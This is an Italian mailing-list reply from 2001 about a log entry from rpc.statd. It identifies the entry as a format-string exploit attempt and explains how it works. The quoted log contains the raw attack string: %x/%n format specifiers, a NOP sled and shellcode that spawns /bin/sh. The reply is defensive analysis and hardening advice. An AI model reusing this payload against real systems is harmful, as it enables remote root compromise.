[Tech] Che vuol dire?

Gianni Bianchini giannibi@firenze.linux.it
Mer 26 Set 2001 00:03:35 CEST 

On Tue, Sep 25, 2001 at 08:23:38PM +0200, Leandro Noferini wrote:

> oggi ero connesso ad internet  e lasciavo scorrere il log del computer
> che  effettua la  connessione (sul  quale gira  anche bind,  di potato
> liscio liscio) e ho visto scorrere questo messaggio:
> 
> Sep 26 01:43:52 bbs /sbin/rpc.statd[147]:

Temo sia un tentativo si exploit del baco di rpc.statd (occhio a
tenere nfs e colleghi cosi' belli aperti) di cui a

http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=discussion&id=1480

Si tratterebbe di un format string bug.

> gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> Sep 26 01:43:52 bbs Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ

Sembra in effetti un classico attacco a stringa di formato, che permette
di iniettare codice esterno ed eseguirlo (da root, utente sotto cui
gira rpc.statd). Nota tutti quei %(numero)x seguiti da %n all'inizio
della stringa, una serie di 220 (prob. ottale) corrispondente a 90
esadecimale (opcode dell'istruzione NOP dell'x86, altra impronta
classica di un attacco di questo tipo) e alla fine un /bin/sh un po'
nascosto nelle ultime righe (probabilmente fatte di codice
eseguibile). In pratica rpc.statd viene trasformato in una shell di
root da remoto. Un bel pitone, insomma. :)

Controlla la versione di statd che stavi usando e limita sempre
l'accesso a rpc e nfs solo alle mecchine fidate.

Ciao.
Gianni.


--
   Gianni Bianchini - giannibi@firenze.linux.it
                      giannibi@iname.com

Maggiori informazioni sulla lista flug-tech